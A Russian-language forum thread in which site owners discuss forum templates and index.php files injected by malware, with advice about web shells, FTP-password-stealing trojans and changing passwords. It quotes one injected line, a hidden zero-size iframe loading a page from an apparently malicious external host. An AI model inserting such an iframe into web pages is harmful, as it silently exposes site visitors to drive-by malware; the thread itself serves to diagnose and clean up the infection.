Троян Backdoor на форуме

[ElenaI]

Странная ситуация - вылавливают его не все юзеры, меньшинство, но сам факт меня озадачил. Прошлась по файлам - никаких изменений с апреля, а вирусные предупреждения начались в августе. Попросила очень занятого программиста хоть глазком одним посмотреть, что за чертовщина. Он "глянул рендерный текст" и вот чего узрел прямо после хедера:

<!-- / End board header -->

<iframe src="http://icqspl.jino-net.ru/index.php" width="0" height="0"></iframe>

 

Вопрос такой - ГДЕ искать эту строку? в каких файлах? Голову сломала уже

Версия форума 2.2.2, лицензионная

[ElenaI]

История продолжается... Сменила пароль на ftp. Но сегодня мне снова вписали в основной шаблон форума (общий) ту же дрянь. Удалила. Сменила оба админ. пароля (нас в админку двое вхожих было - я и тот, кто мне все устанавливал). Посмотрим, что будет. Но если не поможет? Где дыра? Есть идеи? Может, обновиться до новой версии форума? Но сама боюсь - форум интегрирован по юзерам с Joomla, не уверена, что ничего не попорчу?

[Stiks]

ElenaI.

Ищите шелл на фтп в папке с форумом.

Через шелл злоумышленник имеет доступ ко-всем файлам вашего форума.

Достаточно прочесть содержимое conf_global.php.

[Chin]

С запозданием отвечу.

Сейчас развелась куча троянов, которые из популярных фтп менеджеров воруют пароли (фар, тотал коммандер и т.д.)

Проверьте свою машину на наличие таких троянов обязательно, иначе вы можете пароли менять хоть "пицот" раз - не поможет.

Если не найдете вебшелла в папке на хосте - попробуйте сменить фтп пароль с ДРУГОЙ машины.

Если найдете - тоже с ДРУГОЙ смените. Вероятность вируса очень велика, сейчас несколько таких гуляет, именно под "веб-мастеров" написанных чтобы сайты хакать.

[aridanew]

Сегодня столкнулась с проблемой, что были заменены все index.php файлы на FTP вплоть до 5го уровня вложенности. В указанном месте общего шаблона никаких посторонних строк. Да и собственно файлы форума сами не пострадали ни один, кроме индексов. Это что за дрянь и как бороться? Чистить машину первым делом от троянов? А цель такой атаки в чем? Ну завалили индексы, ну не открывается сайт-форум. Поменяли обратно - открылось. Пароль стырить - это богато возможностями, не спорю. Но судя по времени изменения файлов все это как-то скриптом сделано - в одну минуту.

[Kaplan]

Елена, а где у Вас хостинг? Случайно, не на ValueHost?

[Sannis]

Сегодня столкнулась с проблемой, что были заменены все index.php файлы на FTP вплоть до 5го уровня вложенности. В указанном месте общего шаблона никаких посторонних строк. Да и собственно файлы форума сами не пострадали ни один, кроме индексов. Это что за дрянь и как бороться? Чистить машину первым делом от троянов? А цель такой атаки в чем? Ну завалили индексы, ну не открывается сайт-форум. Поменяли обратно - открылось. Пароль стырить - это богато возможностями, не спорю. Но судя по времени изменения файлов все это как-то скриптом сделано - в одну минуту.

Обычно добавляют ещё в десяток php файлов, так что лучше проверьте и их на всякий случай.

[aridanew]

Обычно добавляют ещё в десяток php файлов, так что лучше проверьте и их на всякий случай.

Внимательнейшим образом посмотрела все директории, другие файлы c нормальными датами и размерами вроде бы. Таких подозрительных и неизвестных файлов нет. А как примерно могут называться эти файлы троянские? кроме как index.php

Самих imdex.php было точно не меньше десятка, было еще целых два index.txt. Все повыкинуто и заменено.

Изменено 27 Сентября 2007 пользователем aridanew

[rrus]

В сети интернет появился новый тип вируса - Downloader.JS.Psyme.ct (возможны другия названия), распространяющий себя через веб-сайты. Схема заражения довольно проста: достаточно зайти на зараженный сайт и при стандартных настройках безопасности браузера, вирус автоматически установится на компьютере пользователя. После этого он начинает отслеживать логины и пароли от FTP, высылая их злоумышленникам. Собрав определенное количество паролей, запускается специальная программа, которая подключается по FTP к каждому сайту и встраивает в начало или конец страниц собственный html-код.

 

В случае обнаружения следов вируса необходимо выполнить следующие действия с обязательным соблюдением порядка:

1. Удалить вирусное содержимое со страниц вашего сайта.

2. Проверить локальный компьютер на наличие вирусов.

3. Зайти в панель управления хостинг-аккаунтом и изменить пароль на пользователя FTP.

 

Обращаем внимание, что в интернете можно встретить обсуждение данной проблемы, где в качестве причин заражения указываются различные бесплатные \"движки\" (phpBB и т.д.), либо наличие уязвимостей у хостинг-провайдеров. Со своей стороны можем заверить, что вирус распространяется только способом, описанным в этом письме, и его появление не связано с проблемами безопасности на сервере.

[ElenaI]

Елена, а где у Вас хостинг? Случайно, не на ValueHost?

Хостинг на e-planet. Сорри, давно не заглядывала в тему.

Проблему все-таки решила сменой всех возможных паролей, в т.ч. и пароля в админку форума. Вот с тех пор уже больше месяца меня не трогают. Чего и всем искренне желаю, ибо траблов и без этой дряни хватает

[hfv]

Измени пароль на ФТП!

у меня такая же беда была - поменял все пароли и стало ок.